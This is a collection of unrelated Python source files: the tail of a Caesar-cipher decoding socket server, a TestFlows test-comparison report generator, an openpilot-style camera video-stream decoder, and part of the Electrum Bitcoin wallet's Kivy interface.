Decodes a string encrypted with the Caesar Cipher.
@input_string: String to decode.
@shift: Unsigned integer that represents the number of shifts applied to
each character.
@return: String that represents the input string after Caesar Cipher
decoding.
'''
decoded = ''
for i in input_string:
temp = ord(i) - (shift % 26)
if temp < ord('a'):
decoded += chr(ord('z') + 1 + (temp % (- ord('a'))))
else:
decoded += chr(temp)
return decoded
def recvall(socket, size):
'''
Receive all data of a certain size through a socket.
@socket: Socket object to receive data through.
@size: Total size of data to receive.
@return: The complete data received.
'''
data = b''
while len(data) < size:
msg = socket.recv(size - len(data))
if not msg:
return None
data += msg
return data
def handle_client(con):
'''
Handle a new client connection.
@con: Client socket.
'''
# Receive the string size from the client.
msg = recvall(con, 4)
string_size = struct.unpack('!i', msg)[0]
# Receive the encoded string from the client.
msg = recvall(con, string_size)
encoded_string = msg.decode('ascii')
# Receive the Caesar Cipher shift value from the client.
msg = recvall(con, 4)
caesar_shift = struct.unpack('!i', msg)[0]
decoded = decode_caesar(encoded_string, caesar_shift)
print(decoded)
sys.stdout.flush()
# Send decoded string back to client.
con.sendall(decoded.encode('ascii'))
def main():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set timeout for recv.
rcv_timeo = struct.pack('ll', 15, 0)
server.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, rcv_timeo)
orig = ('', args.port_server)
server.bind(orig)
while True:
server.listen(1)
try:
con, client = server.accept()
except BlockingIOError:
continue
t = threading.Thread(target=handle_client, args=(con,))
t.start()
server.close()
main()
|
command.py
|
# Copyright 2020 Katteli Inc.
# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import sys
import json
import time
import base64
import threading
from datetime import datetime
import testflows.settings as settings
import testflows._core.cli.arg.type as argtype
from testflows._core import __version__
from testflows._core.flags import Flags, SKIP
from testflows._core.testtype import TestType
from testflows._core.cli.arg.common import epilog
from testflows._core.cli.arg.common import HelpFormatter
from testflows._core.cli.arg.handlers.report.copyright import copyright
from testflows._core.transform.log.pipeline import ResultsLogPipeline
from testflows._core.utils.sort import human
from testflows._core.utils.timefuncs import localfromtimestamp, strftimedelta
from testflows._core.filters import The
from testflows._core.name import sep
from testflows._core.transform.log.report.totals import Counts
from testflows._core.cli.arg.handlers.handler import Handler as HandlerBase
logo = '<img class="logo" src="data:image/png;base64,%(data)s" alt="logo"/>'
testflows = '<span class="testflows-logo"></span> [<span class="logo-test">Test</span><span class="logo-flows">Flows</span>]'
testflows_em = testflows.replace("[", "").replace("]", "")
template = f"""
<section class="clearfix">%(logo)s%(confidential)s%(copyright)s</section>
---
# %(title)s Comparison Report
%(body)s
---
Generated by {testflows} Open-Source Test Framework
[<span class="logo-test">Test</span><span class="logo-flows">Flows</span>]: https://testflows.com
"""
class Formatter:
def format_logo(self, data):
if not data["company"].get("logo"):
return ""
data = base64.b64encode(data["company"]["logo"]).decode("utf-8")
return '\n<p>' + logo % {"data": data} + "</p>\n"
def format_confidential(self, data):
if not data["company"].get("confidential"):
return ""
return f'\n<p class="confidential">Document status - Confidential</p>\n'
def format_copyright(self, data):
if not data["company"].get("name"):
return ""
return (f'\n<p class="copyright">\n'
f'{copyright(data["company"]["name"])}\n'
"</p>\n")
def format_metadata(self, data):
metadata = data["metadata"]
s = (
"\n\n"
f"||**Date**||{localfromtimestamp(metadata['date']):%b %d, %Y %-H:%M}||\n"
f'||**Framework**||'
f'{testflows} {metadata["version"]}||\n'
)
if metadata.get("order-by"):
s += f'||**Order By**||{metadata["order-by"].capitalize()}||\n'
if metadata.get("sort"):
s += f'||**Sort**||{"Ascending" if metadata["sort"] == "asc" else "Descending"}||\n'
if metadata.get("filter"):
s += f'||**Filter**||{metadata["filter"]}||\n'
return s + "\n"
def format_reference(self, data):
table = data["table"]
s = "\n\n## Reference\n\n"
# reference table
s += " | ".join(table["reference"]["header"]) + "\n"
s += " | ".join(["---"] * len(table["reference"]["header"])) + "\n"
for row in table["reference"]["rows"]:
s += " | ".join(row) + "\n"
return s
def format_table(self, data):
table = data["table"]
s = "\n\n## Comparison\n\n"
# comparison table
s += " | ".join(table["header"]) + "\n"
s += " | ".join(["---"] * len(table["header"])) + "\n"
span = '<span class="result result-%(cls)s">%(name)s</span>'
for row in table["rows"]:
name, *results = row
s += " | ".join([name] + [
span % {'cls': result["result_type"].lower() if result else 'na', 'name': result["result_type"] if result else '-'} for result in results
]) + "\n"
return s
def format_chart(self, data):
script = """
window.onload = function() {
window.chart = c3.generate({
bindto: '#data-chart',
legend: {
position: 'inset',
inset: {
anchor: 'top-right',
x: 50,
y: -30,
step: 1
}
},
padding: {
top: 30
},
data: {
x: 'x',
columns: [
['x', %(values)s],
['OK', %(ok)s],
['Fail', %(fail)s],
['Known', %(known)s]
],
types: {
OK: 'area',
Fail: 'area',
Known: 'area',
// 'line', 'spline', 'step', 'area', 'area-step' are also available to stack
},
groups: [['OK', 'Fail', 'Known']],
colors: {
'OK': 'rgba(31, 239, 184, 0.7)',
'Fail': 'rgba(241, 88, 88, 0.7)',
'Known': 'rgba(137, 182, 239, 0.7)'
}
},
axis: {
x: {
type: 'category'
},
y: {
label: "Tests",
tick: {
format: function (d) {
return (parseInt(d) == d) ? d : null;
},
}
}
}
});
};
"""
script = script % {
"ok": ",".join([str(c) for c in data["chart"]["ok"]]),
"fail": ",".join([str(c) for c in data["chart"]["fail"]]),
"known": ",".join([str(c) for c in data["chart"]["known"]]),
"values": ",".join([f"'{str(c)}'" for c in data["chart"]["x"]])
}
s = (
'\n\n## Chart\n\n'
'<script src="https://cdnjs.cloudflare.com/ajax/libs/d3/5.15.0/d3.min.js"></script>\n'
'<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/c3/0.7.12/c3.min.css">\n'
'<script src="https://cdnjs.cloudflare.com/ajax/libs/c3/0.7.12/c3.min.js"></script>\n'
'<div><div id="data-chart"></div></div>\n'
'<script>\n'
f'{script}\n'
'</script>'
)
return s
def format(self, data):
body = self.format_metadata(data)
body += self.format_reference(data)
body += self.format_chart(data)
body += self.format_table(data)
return template.strip() % {
"title": "Results",
"logo": self.format_logo(data),
"confidential": self.format_confidential(data),
"copyright": self.format_copyright(data),
"body": body
}
class Handler(HandlerBase):
Formatter = NotImplementedError
@classmethod
def add_arguments(cls, parser):
parser.add_argument("--log", metavar="pattern", type=argtype.logfile("r", bufsize=1, encoding="utf-8"),
nargs="+", help="log file pattern", required=True)
parser.add_argument("--log-link", metavar="attribute",
help="attribute that is used as a link for the log, default: job.url",
type=str, default="job.url")
parser.add_argument("--only", metavar="pattern", nargs="+",
help="compare only selected tests", type=str, required=False)
parser.add_argument("--order-by", metavar="attribute", type=str,
help="attribute that is used to order the logs")
parser.add_argument("--sort", metavar="direction", type=str,
help="sort direction. Either 'asc' or 'desc', default: asc", choices=["asc", "desc"], default="asc")
parser.add_argument("--format", metavar="type", type=str,
help="output format, default: md (Markdown)", choices=["md"], default="md")
parser.add_argument("output", metavar="output", type=argtype.file("w", bufsize=1, encoding="utf-8"),
nargs="?", help='output file, default: stdout', default="-")
parser.add_argument("--copyright", metavar="name", help="add copyright notice", type=str)
parser.add_argument("--confidential", help="mark as confidential", action="store_true")
parser.add_argument("--logo", metavar="path", type=argtype.file("rb"),
help='use logo image (.png)')
def chart(self, counts):
chart = {
"ok": [],
"fail": [],
"known": [],
"x": []
}
for counts in reversed(list(counts.values())):
chart["ok"].append(counts.ok)
chart["fail"].append(counts.fail + counts.error + counts.null)
chart["known"].append(counts.xok + counts.xfail + counts.xerror + counts.xnull)
chart["x"].append(counts.reference)
return chart
def get_attribute(self, result, name, default=None):
tests = list(result["tests"].values())
if not tests:
return default
test = tests[0]["test"]
for attr in test["attributes"]:
if attr["attribute_name"] == name:
return attr["attribute_value"]
return default
def filter(self, tests, only):
if not only:
return tests
filters = []
for pattern in only:
filters.append(The(pattern).at(sep))
_tests = []
for test in tests:
match = False
for filter in filters:
if filter.match(test, prefix=False):
match = True
break
if match:
_tests.append(test)
return _tests
def counts(self, tests, results):
results_counts = {}
for log, result in results.items():
results_counts[log] = Counts("tests", *([0] * 10))
_counts = results_counts[log]
_counts.reference = result["reference"]
for testname in tests:
test = result["tests"].get(testname)
if test and test.get("result"):
if not test["result"].get("result_type"):
raise ValueError(f"no result for '{test['test']['test_name']}'")
_name = test["result"]["result_type"].lower()
setattr(_counts, _name, getattr(_counts, _name) + 1)
_counts.units += 1
return results_counts
def sort(self, results, order_by=None, direction="asc"):
_results = {}
def order_key(v):
started = results[v].get("started", 0)
if order_by:
value = "-"
if results[v].get("tests"):
value = self.get_attribute(results[v], order_by, value)
return [value, started]
return [started]
key_order = sorted(results, key=order_key, reverse=True)
if direction == "desc":
key_order = reversed(key_order)
for i, key in enumerate(key_order):
_results[key] = results[key]
ref = order_key(key)
ref[-1] = f'{localfromtimestamp(ref[-1]):%b %d, %-H:%M}'
if order_by:
ref = f'{ref[0]}, {ref[-1]}'
else:
ref = ref[-1]
_results[key]["reference"] = ref
return _results
def tests(self, results):
tests = []
for r in results.values():
for uname, test in r["tests"].items():
if getattr(TestType, test["test"]["test_type"]) < TestType.Test:
continue
tests.append(uname)
return human(list(set(tests)))
def table(self, tests, results, ref_link=None):
table = {
"header": ["Test Name"] + [f'<a href="#ref-{results[r]["reference"]}">{results[r]["reference"]}</a>' for r in results],
"rows": [],
"reference": {
"header": ["Reference", "Link"],
"rows": [[f'<span id="ref-{results[r]["reference"]}"><strong>{results[r]["reference"]}</strong></span>', self.get_attribute(results[r], str(ref_link), r)] for r in results]
},
}
if not tests:
table["rows"].append([""] * len(results.values()))
for test in tests:
row = [test]
for result in results.values():
if result["tests"].get(test) and result["tests"].get(test).get("result"):
row.append(result["tests"].get(test)["result"])
else:
row.append(None)
table["rows"].append(row)
return table
def metadata(self, only, order_by, direction):
return {
"date": time.time(),
"version": __version__,
"order-by": order_by,
"sort": direction,
"filter": (" ".join(only) if only else "None")
}
def company(self, args):
d = {}
if args.copyright:
d["name"] = args.copyright
if args.confidential:
d["confidential"] = True
if args.logo:
d["logo"] = args.logo.read()
return d
def data(self, results, args):
d = dict()
results = self.sort(results, args.order_by, args.sort)
d["tests"] = self.filter(self.tests(results), args.only)
d["table"] = self.table(d["tests"], results, args.log_link)
d["counts"] = self.counts(d["tests"], results)
d["chart"] = self.chart(d["counts"])
d["metadata"] = self.metadata(args.only, args.order_by, args.sort)
d["company"] = self.company(args)
return d
def generate(self, formatter, results, args):
output = args.output
output.write(
formatter.format(self.data(results, args))
)
output.write("\n")
def handle(self, args):
results = {}
threads = []
def thread_worker(log, results):
ResultsLogPipeline(log, results).run()
for log in args.log:
log_results = {}
threads.append(
threading.Thread(target=thread_worker, args=(log, log_results))
)
results[log.name] = log_results
threads[-1].start()
for thread in threads:
thread.join()
formatter = self.Formatter()
self.generate(formatter, results, args)
|
compressed_vipc.py
|
#!/usr/bin/env python3
import av
import os
import sys
import argparse
import numpy as np
import multiprocessing
import time
import cereal.messaging as messaging
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
W, H = 1928, 1208
V4L2_BUF_FLAG_KEYFRAME = 8
def decoder(addr, sock_name, vipc_server, vst, nvidia):
print("start decoder for %s" % sock_name)
if nvidia:
os.environ["NV_LOW_LATENCY"] = "3" # both bLowLatency and CUVID_PKT_ENDOFPICTURE
sys.path += os.environ["LD_LIBRARY_PATH"].split(":")
import PyNvCodec as nvc # pylint: disable=import-error
nvDec = nvc.PyNvDecoder(W, H, nvc.PixelFormat.NV12, nvc.CudaVideoCodec.HEVC, 0)
cc1 = nvc.ColorspaceConversionContext(nvc.ColorSpace.BT_709, nvc.ColorRange.JPEG)
conv_yuv = nvc.PySurfaceConverter(W, H, nvc.PixelFormat.NV12, nvc.PixelFormat.YUV420, 0)
nvDwn_yuv = nvc.PySurfaceDownloader(W, H, nvc.PixelFormat.YUV420, 0)
img_yuv = np.ndarray((H*W//2*3), dtype=np.uint8)
else:
codec = av.CodecContext.create("hevc", "r")
os.environ["ZMQ"] = "1"
messaging.context = messaging.Context()
sock = messaging.sub_sock(sock_name, None, addr=addr, conflate=False)
cnt = 0
last_idx = -1
seen_iframe = False
time_q = []
while 1:
msgs = messaging.drain_sock(sock, wait_for_one=True)
for evt in msgs:
evta = getattr(evt, evt.which())
if evta.idx.encodeId != 0 and evta.idx.encodeId != (last_idx+1):
print("DROP PACKET!")
last_idx = evta.idx.encodeId
if not seen_iframe and not (evta.idx.flags & V4L2_BUF_FLAG_KEYFRAME):
print("waiting for iframe")
continue
time_q.append(time.monotonic())
network_latency = (int(time.time()*1e9) - evta.unixTimestampNanos)/1e6
frame_latency = ((evta.idx.timestampEof/1e9) - (evta.idx.timestampSof/1e9))*1000
process_latency = ((evt.logMonoTime/1e9) - (evta.idx.timestampEof/1e9))*1000
# put in header (first)
if not seen_iframe:
if nvidia:
nvDec.DecodeSurfaceFromPacket(np.frombuffer(evta.header, dtype=np.uint8))
else:
codec.decode(av.packet.Packet(evta.header))
seen_iframe = True
if nvidia:
rawSurface = nvDec.DecodeSurfaceFromPacket(np.frombuffer(evta.data, dtype=np.uint8))
if rawSurface.Empty():
print("DROP SURFACE")
continue
convSurface = conv_yuv.Execute(rawSurface, cc1)
nvDwn_yuv.DownloadSingleSurface(convSurface, img_yuv)
else:
frames = codec.decode(av.packet.Packet(evta.data))
if len(frames) == 0:
print("DROP SURFACE")
continue
assert len(frames) == 1
img_yuv = frames[0].to_ndarray(format=av.video.format.VideoFormat('yuv420p')).flatten()
vipc_server.send(vst, img_yuv.data, cnt, int(time_q[0]*1e9), int(time.monotonic()*1e9))
cnt += 1
pc_latency = (time.monotonic()-time_q[0])*1000
time_q = time_q[1:]
print("%2d %4d %.3f %.3f roll %6.2f ms latency %6.2f ms + %6.2f ms + %6.2f ms = %6.2f ms" % (len(msgs), evta.idx.encodeId, evt.logMonoTime/1e9, evta.idx.timestampEof/1e6, frame_latency, process_latency, network_latency, pc_latency, process_latency+network_latency+pc_latency ), len(evta.data), sock_name)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Decode video streams and broacast on VisionIPC")
parser.add_argument("addr", help="Address of comma three")
parser.add_argument("--nvidia", action="store_true", help="Use nvidia instead of ffmpeg")
parser.add_argument("--cams", default="0,1,2", help="Cameras to decode")
args = parser.parse_args()
all_cams = [
("roadEncodeData", VisionStreamType.VISION_STREAM_ROAD),
("wideRoadEncodeData", VisionStreamType.VISION_STREAM_WIDE_ROAD),
("driverEncodeData", VisionStreamType.VISION_STREAM_DRIVER),
]
cams = dict([all_cams[int(x)] for x in args.cams.split(",")])
vipc_server = VisionIpcServer("camerad")
for vst in cams.values():
vipc_server.create_buffers(vst, 4, False, W, H)
vipc_server.start_listener()
for k,v in cams.items():
multiprocessing.Process(target=decoder, args=(args.addr, k, vipc_server, v, args.nvidia)).start()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mUBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
